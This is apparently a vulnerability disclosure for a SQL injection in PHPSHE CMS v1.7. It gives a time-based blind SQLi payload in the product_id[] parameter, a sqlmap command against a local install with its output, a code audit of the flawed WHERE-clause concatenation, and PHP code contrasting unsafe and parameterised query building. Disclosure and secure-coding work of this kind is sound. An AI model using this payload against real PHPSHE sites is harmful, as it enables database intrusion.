Verify with the following PoC.

Vulnerability injection point (sqlmap result):

```
Parameter: Array-like #2* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: checkall=on&product_id[]=2' AND SLEEP(5) AND 'sTmn'='sTmn&product_order[2]=10000&product_id[]=1&product_order[1]=10000
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
```
1. Vulnerability description
Detection object:
(1) website name: PHPSHE CMS system V1.7
(2) website domain name: http://www.phpshe.com/
(3) the IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C system v1.7 (build 20180905 UTF8)
Detection time:
January 3, 2019
Description of vulnerability:
Lingbao JianHao Network Technology Co., Ltd. PHPSHE CMS system: SQL injection vulnerability.
2. PoC and verification
Local test environment:
1. Download the PHPSHE V1.7 mall system from http://www.phpshe.com/down/phpshe1.7.rar
2. Log in to the back end at http://localhost/phpshe1.7/admin.php; the user/password is admin/admin
Vulnerability injection point:
Vulnerability verification:

```sh
python sqlmap.py -r 11.txt --batch --random-agent -o --scope='localhost' --dbms=Mysql --current-user -v 5
```

11.txt file contents:

sqlmap output:

```
current user: 'root@localhost'
```
Code audit:
Set up the environment locally and submit the following request:

```
POST /phpshe1.7/admin.php?mod=product&act=state&state=1&token=84ba604db8935c8201fa2af409f11741
```

After the submission, line 87 of admin.php enters the product.php logic.
The pe_update function updates the database:
![3](https://user-images.githubusercontent.com/16933557/50735937-19412100-11f1-11e9-9cfc-949734a2c334.jpg)
`product=product $product_id=(sql) $_g_state=state`
The pe_update function calls _dowhere to build the WHERE condition:
![4](https://user-images.githubusercontent.com/16933557/50735941-23631f80-11f1-11e9-9e58-814f1ecd0582.jpg)
3. SQL concatenation in the _dowhere function:
![5](https://user-images.githubusercontent.com/16933557/50735948-31b13b80-11f1-11e9-86c5-a5098417c1b8.jpg)
When the sqlwhere string is returned after concatenation, note that the malicious input has been concatenated into it unchanged:
![6](https://user-images.githubusercontent.com/16933557/50735951-38d84980-11f1-11e9-9ea3-579ee0fed44e.jpg)
Finally, the database update succeeds with the injected condition:
![7](https://user-images.githubusercontent.com/16933557/50735953-41308480-11f1-11e9-87c8-f10ab72c94c0.jpg)
![8](https://user-images.githubusercontent.com/16933557/50735956-48579280-11f1-11e9-841e-68d8f99ff77f.jpg)
![9](https://user-images.githubusercontent.com/16933557/50735960-4ee60a00-11f1-11e9-9430-d18769679e1c.jpg)
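The root cause described above is that each `product_id[]` value is concatenated into the WHERE clause without type enforcement or parameter binding. The following added example (not PHPSHE's code; function, table and column names are hypothetical) models that pattern beside a hardened version that validates the IDs as integers and passes them as bound parameters.

```php
<?php
// Added example, not PHPSHE's own code. Models the audit finding above:
// values from $_POST['product_id'][] flow into a WHERE clause by string
// concatenation. Function/table/column names are hypothetical.

// Vulnerable pattern: array values are interpolated verbatim.
function build_where_unsafe(array $ids): string {
    $parts = [];
    foreach ($ids as $id) {
        $parts[] = "'" . $id . "'";   // no escaping, no type check
    }
    return "product_id IN (" . implode(',', $parts) . ")";
}

// Hardened pattern: enforce the integer type, then bind the values.
function build_where_safe(array $ids): array {
    $clean = [];
    foreach ($ids as $id) {
        // Reject nested arrays and anything that is not a plain integer.
        if (is_array($id) || !preg_match('/^\d{1,10}$/', (string)$id)) {
            throw new InvalidArgumentException('product_id must be a positive integer');
        }
        $clean[] = (int)$id;
    }
    if ($clean === []) {
        throw new InvalidArgumentException('no product_id given');
    }
    $placeholders = implode(',', array_fill(0, count($clean), '?'));
    return ["product_id IN ($placeholders)", $clean];
}

// Constructed request resembling the PoC above.
$post = ['product_id' => ["2' AND SLEEP(5) AND 'sTmn'='sTmn", '1']];

// The unsafe builder passes the SLEEP() condition straight through.
echo build_where_unsafe($post['product_id']), "\n";

// The safe builder refuses the same input before any SQL is built.
try {
    build_where_safe($post['product_id']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// Legitimate input yields a parameterised clause for a prepared statement
// (hypothetical table/column): UPDATE product SET state = ? WHERE $where
[$where, $params] = build_where_safe(['2', '1']);
echo $where, ' with params ', implode(',', $params), "\n";
```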